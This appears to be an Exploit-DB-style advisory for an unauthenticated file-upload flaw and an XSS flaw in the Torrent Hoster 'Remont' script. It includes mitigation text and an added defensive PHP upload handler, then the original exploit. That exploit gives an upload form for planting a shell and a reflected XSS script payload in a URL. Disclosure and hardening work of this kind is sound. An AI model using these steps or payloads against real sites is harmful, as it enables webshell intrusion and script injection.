Vendor: Remont
By: El-Kahina
CVSS: 8,8 HIGH
Upload
CWE: 434
Product Name: Remont
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
2020

Torrent Hoster Remont Upload Exploit

An attacker can exploit a vulnerability in Torrent Hoster Remont to upload malicious files. The vulnerability is in 'upload.php', which accepts a file upload without any authentication. The file is supplied in the 'upfile' parameter of 'upload.php' and can then be accessed by visiting the 'torrents' directory. An attacker can also exploit an XSS vulnerability in 'forgot_password.php' to execute malicious JavaScript code.

Mitigation:

The application should validate the file type before allowing the file to be uploaded. The application should also validate input parameters to prevent XSS attacks.
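
The upload-side mitigation described above, as an added PHP example (not code from Torrent Hoster or from the advisory). The session key `user_id`, the storage path and the 1 MiB limit are assumptions; only the `upfile` field name comes from the page.

```php
<?php
declare(strict_types=1);
// Added example, not Torrent Hoster's code. Assumed: 'user_id', STORE_DIR, MAX_BYTES.
session_start();

const MAX_BYTES = 1048576;                        // assumed 1 MiB limit
const STORE_DIR = '/var/lib/torrenthoster/files'; // assumed path outside the web root

function reject(int $code, string $msg): void {
    http_response_code($code);
    header('Content-Type: text/plain; charset=utf-8');
    exit($msg);
}

// Sanity check only: a .torrent is a bencoded dictionary ("d...e") with an "info" key.
// It does not prove the file is harmless; script text can sit inside valid bencode.
function looks_like_torrent(string $data): bool {
    return strlen($data) > 2
        && $data[0] === 'd'
        && substr($data, -1) === 'e'
        && strpos($data, '4:info') !== false;
}

// 1. The page notes that upload.php accepts files without authentication.
if (empty($_SESSION['user_id'])) {
    reject(403, 'Login required');
}

// 2. Exactly one file in the 'upfile' field, received without error, within the limit.
$f = $_FILES['upfile'] ?? null;
if (!is_array($f) || is_array($f['error']) || $f['error'] !== UPLOAD_ERR_OK
    || $f['size'] > MAX_BYTES || !is_uploaded_file($f['tmp_name'])) {
    reject(400, 'Invalid upload');
}

// 3. Check the content itself; the client-supplied name and MIME type are ignored.
$data = file_get_contents($f['tmp_name']);
if ($data === false || !looks_like_torrent($data)) {
    reject(415, 'Not a torrent file');
}

// 4. Server-chosen name and fixed extension, stored where the web server neither
//    executes nor lists files (unlike the browsable 'torrents' directory).
$name = bin2hex(random_bytes(16)) . '.torrent';
if (!move_uploaded_file($f['tmp_name'], STORE_DIR . '/' . $name)) {
    reject(500, 'Could not store file');
}
echo $name;
```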

Exploit-DB raw data:

========================================================================================                  
| # Title    : Torrent Hoster Remont Upload Exploit           
| # Author   : El-Kahina                                                                                                                
| # Home     : www.h4kz.com
| # Script   : Powered by Torrent Hoster.
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug      : Upload    
|                                                                  
======================      Exploit By El-Kahina       =================================
 # Exploit  : 
 
 1 - use tamper data :
 
 http://127.0.0.1/torrenthoster//torrents.php?mode=upload
 
 2- 
    <center>
   Powered by Torrent Hoster
        <br />
        <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
        <strong>&#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; &#65533;&#65533; &#65533;&#65533;:</strong> <?php echo $maxfilesize; ?>&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;<br />
<br>
        <input type="file" name="upfile" size="50" /><br />
<input type="submit" value="&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;" id="upload" />
        </form>
        <div id="part2" style="display: none;">&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; .. &#65533;&#65533; &#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;</div>
        </center>
        
3 - http://127.0.0.1/torrenthoster/torrents/  (to find shell)      
        
4 - Xss:

http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
       
==========================================
Greetz : Exploit-db Team 
all my friend :(Dz-Ghost Team ) 
im indoushka's sister
------------------------------------------